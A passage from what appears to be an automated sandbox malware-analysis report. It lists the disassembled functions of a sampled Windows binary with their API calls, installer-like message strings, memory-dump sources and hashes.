                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4071923889-0
                                                                                                                                                                      • Opcode ID: 850a72953981ce9edb868da7459edebcc2632116b2b545f387b9c6d7e5d6c3ec
                                                                                                                                                                      • Instruction ID: ae4672943cd7382c52be368afd98a0e744302f00d430d4f9e0a97d6bd95691cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 850a72953981ce9edb868da7459edebcc2632116b2b545f387b9c6d7e5d6c3ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C01F931A006087EEB10979D8C02F5B7BACDB89764F610127F904DB2C2C5789D408A68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D1F8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D20F
                                                                                                                                                                      • LoadResource.KERNEL32(00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C,0000000A,00000000), ref: 0040D229
                                                                                                                                                                      • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C), ref: 0040D243
                                                                                                                                                                      • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?), ref: 0040D24D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                      • Opcode ID: 6d658be113ba3aa03d5f677db781cf2e4774c78ffffff2f8b1b208180f945aeb
                                                                                                                                                                      • Instruction ID: 3283e33870439dafd25d8e1e147512606e62b5bf6a0133693b61d2317928fdf1
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d658be113ba3aa03d5f677db781cf2e4774c78ffffff2f8b1b208180f945aeb
                                                                                                                                                                      • Instruction Fuzzy Hash: C5F04FB26056047F8B04EE99A881D5B77DDDE88264314027EF908EB242DA38DD018B69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004019CC Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 730355536-0
                                                                                                                                                                      • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                                                                                      • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                                                                                      • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                                                                                      • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004703C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00470411
                                                                                                                                                                      Strings
                                                                                                                                                                      • Unsetting NTFS compression on file: %s, xrefs: 004703F7
                                                                                                                                                                      • Setting NTFS compression on file: %s, xrefs: 004703DF
                                                                                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 00470422
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                                                                      • API String ID: 1452528299-3038984924
                                                                                                                                                                      • Opcode ID: f0631fc1abcb5e6c24753434766323da19841b114823f122e70a46aa5477e38e
                                                                                                                                                                      • Instruction ID: 0d596443d05caf7374ea98a63d842d8765eee9d82fb477a7c18f0f713548320e
                                                                                                                                                                      • Opcode Fuzzy Hash: f0631fc1abcb5e6c24753434766323da19841b114823f122e70a46aa5477e38e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3601A730E0924896CB14D7AD94412EDBBB48F09304F54C1EFB85CE7382DB780A098B9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046FC14 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 0046FC65
                                                                                                                                                                      Strings
                                                                                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 0046FC76
                                                                                                                                                                      • Setting NTFS compression on directory: %s, xrefs: 0046FC33
                                                                                                                                                                      • Unsetting NTFS compression on directory: %s, xrefs: 0046FC4B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                                                                      • API String ID: 1452528299-1392080489
                                                                                                                                                                      • Opcode ID: 4e2ae73057ca26ac78c31a65f3383f89a873c33690346a56dc1072cc9cb6ceb2
                                                                                                                                                                      • Instruction ID: 1ff60dd8eb5a114f2a7af6b3d642365226de0c959c43d8a3966afd89414ec8a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e2ae73057ca26ac78c31a65f3383f89a873c33690346a56dc1072cc9cb6ceb2
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B011730E0824C56CB04D7ADA4412DDBBB4AF4D314F54C5BFA899D7382EA790A0D879B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00455D70 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000,0045B5F5), ref: 00455DAC
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000), ref: 00455DB5
                                                                                                                                                                      • RemoveFontResourceA.GDI32(00000000), ref: 00455DC2
                                                                                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DD6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4283692357-0
                                                                                                                                                                      • Opcode ID: 2c9d3007ea736b92d21178f46b174a6c6605a4082ff51b79f7c1ba61edc26422
                                                                                                                                                                      • Instruction ID: 990a694f9916720730b0810028faebd1b23d30e86244cf38efb64550af4b0806
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c9d3007ea736b92d21178f46b174a6c6605a4082ff51b79f7c1ba61edc26422
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF090B274070036EA10B6B65C46F2B12DC8F54745F10883AB500EF2C3D57CDC044629
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047C52C Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CountSleepTick
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2227064392-0
                                                                                                                                                                      • Opcode ID: 67f47379cb1d60aad0cf173f3f72d5d529b8415d41fe6a8856130e00a5f15448
                                                                                                                                                                      • Instruction ID: a2b460aa88ecba94892aad5d964071206a8b0d845d3bc1a6a013ae29a0728730
                                                                                                                                                                      • Opcode Fuzzy Hash: 67f47379cb1d60aad0cf173f3f72d5d529b8415d41fe6a8856130e00a5f15448
                                                                                                                                                                      • Instruction Fuzzy Hash: 6FE02B627C916065C62131BE18C25BF464CCBC3364B24463FF0CCE7242C85D5C4A873E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00477C98 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7,00000000), ref: 00477CA1
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 00477CA7
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CC9
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CDA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 215268677-0
                                                                                                                                                                      • Opcode ID: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                                                                                                                                      • Instruction ID: 672a73815fb629360b1666c66e1be5f1e4265ed7d7d078eef31aabbee9319095
                                                                                                                                                                      • Opcode Fuzzy Hash: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF037716447007FD600E6B58D81E5B73DCEB44354F04883A7E94D71C1D678DC08A726
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00424238 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastActivePopup.USER32(?), ref: 00424244
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00424255
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 0042425F
                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00424269
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2280970139-0
                                                                                                                                                                      • Opcode ID: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                                                                                                                                      • Instruction ID: 914cdc97238bca482b123af495550876eb6964b08c7fad051248fc704dde4b2b
                                                                                                                                                                      • Opcode Fuzzy Hash: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                                                                                                                                      • Instruction Fuzzy Hash: DEE0EC61706636D7AAA2767B2981A9F618D9DC53C434601ABFC04FB386DB2CDC1181BD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040626C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                                                                                      • GlobalUnWire.KERNEL32(00000000), ref: 00406276
                                                                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                                                                                      • GlobalFix.KERNEL32(00000000), ref: 00406281
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Global$AllocHandleWire
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2210401237-0
                                                                                                                                                                      • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                                                                      • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                                                                                      • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00479BDC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B44D,?,00000000,00000000,00000001,00000000,00479E79,?,00000000), ref: 00479E3D
                                                                                                                                                                      Strings
                                                                                                                                                                      • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479CB1
                                                                                                                                                                      • Failed to parse "reg" constant, xrefs: 00479E44
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close
                                                                                                                                                                      • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                                                      • API String ID: 3535843008-1938159461
                                                                                                                                                                      • Opcode ID: f40322278e1b827f5d7763a137445644a870d13ebafdbdf9348b3f18f65dbd3c
                                                                                                                                                                      • Instruction ID: 5eaaab04e28549974a1eae9ca1a9eb8293ffddd3d671f6967ea537ac56f3ac17
                                                                                                                                                                      • Opcode Fuzzy Hash: f40322278e1b827f5d7763a137445644a870d13ebafdbdf9348b3f18f65dbd3c
                                                                                                                                                                      • Instruction Fuzzy Hash: 81814174E00148AFCF11DF95C881ADEBBF9AF49314F50816AE815BB391D738AE45CB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0045C084 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                                                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 0045C2B9
                                                                                                                                                                      Strings
                                                                                                                                                                      • EndOffset range exceeded, xrefs: 0045C1ED
                                                                                                                                                                      • NumRecs range exceeded, xrefs: 0045C1B6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$BuffersFlush
                                                                                                                                                                      • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                                                                      • API String ID: 3593489403-659731555
                                                                                                                                                                      • Opcode ID: 3a3f4e19b0946b21f915fe73c7f87038415cd3ad77da79caf2374f853903dd7b
                                                                                                                                                                      • Instruction ID: f1827e02de76a306a1886b93aefbbb2344be70999cb9be9d3c0cbcfad0efad24
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a3f4e19b0946b21f915fe73c7f87038415cd3ad77da79caf2374f853903dd7b
                                                                                                                                                                      • Instruction Fuzzy Hash: 35616334A002548FDB25DF25C891ADAB7B5AF49305F0084DAED88AB353D7749EC9CF54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00482B48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B81
                                                                                                                                                                      • SetActiveWindow.USER32(?,00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B93
                                                                                                                                                                      Strings
                                                                                                                                                                      • Will not restart Windows automatically., xrefs: 00482CB2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
